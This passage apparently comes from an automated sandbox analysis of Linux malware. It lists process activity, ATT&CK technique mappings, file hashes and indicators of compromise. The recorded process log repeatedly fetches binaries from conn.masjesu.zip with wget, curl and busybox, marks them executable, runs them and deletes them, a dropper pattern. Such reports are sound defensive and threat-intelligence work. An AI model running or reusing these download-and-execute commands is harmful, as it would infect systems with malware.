  chmod 777 cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - File and Directory Permissions Modification
  PID:976
- /tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  ./cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - Executes dropped EXE
  PID:977
- /bin/rm
  rm cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  PID:978
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - System Network Configuration Discovery
  PID:979
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:980
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  PID:982
- /bin/chmod
  chmod 777 puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - File and Directory Permissions Modification
  PID:983
- /tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  ./puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - Executes dropped EXE
  PID:984
- /bin/rm
  rm puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  PID:985
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - System Network Configuration Discovery
  PID:986
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:987
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - System Network Configuration Discovery
  PID:989
- /bin/chmod
  chmod 777 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - File and Directory Permissions Modification
  PID:990
- /tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  ./0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - Executes dropped EXE
  PID:991
- /bin/rm
  rm 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  PID:992
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  PID:993
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:994
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - System Network Configuration Discovery
  PID:996
- /bin/chmod
  chmod 777 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - File and Directory Permissions Modification
  PID:997
- /tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  ./4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - Executes dropped EXE
  PID:998
- /bin/rm
  rm 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  PID:999
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  PID:1000
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1001
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - System Network Configuration Discovery
  PID:1003
- /bin/chmod
  chmod 777 NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - File and Directory Permissions Modification
  PID:1004
- /tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  ./NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - Executes dropped EXE
  PID:1005
- /bin/rm
  rm NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  PID:1006
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  PID:1007
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1008
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  PID:1010
- /bin/chmod
  chmod 777 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  - File and Directory Permissions Modification
  PID:1011
- /tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  ./9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  - Executes dropped EXE
  PID:1012
- /bin/rm
  rm 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  PID:1013
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - System Network Configuration Discovery
  PID:1014
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1015
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  PID:1017
- /bin/chmod
  chmod 777 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - File and Directory Permissions Modification
  PID:1018
- /tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  ./3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - Executes dropped EXE
  PID:1019
- /bin/rm
  rm 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  PID:1020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn

Filesize
176B

MD5
e1732e70f015e99d14dff1eeeaec9966

SHA1
c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113

SHA256
6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e

SHA512
6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Download Submit
/tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H	738	cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
/tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM	745	puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
/tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag	762	0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
/tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE	791	4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
/tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x	811	NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
/tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw	818	9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
/tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC	842	3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
/tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn	865	YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
/tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD	873	Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
/tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj	881	rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
/tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA	889	dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
/tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz	897	6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
/tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H	905	kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
/tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak	913	RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
/tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn	921	YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
/tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD	929	Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
/tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj	937	rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
/tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA	945	dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
/tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz	953	6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
/tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H	961	kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
/tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak	969	RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
/tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H	977	cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
/tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM	984	puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
/tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag	991	0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
/tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE	998	4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
/tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x	1005	NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
/tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw	1012	9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
/tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC	1019	3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC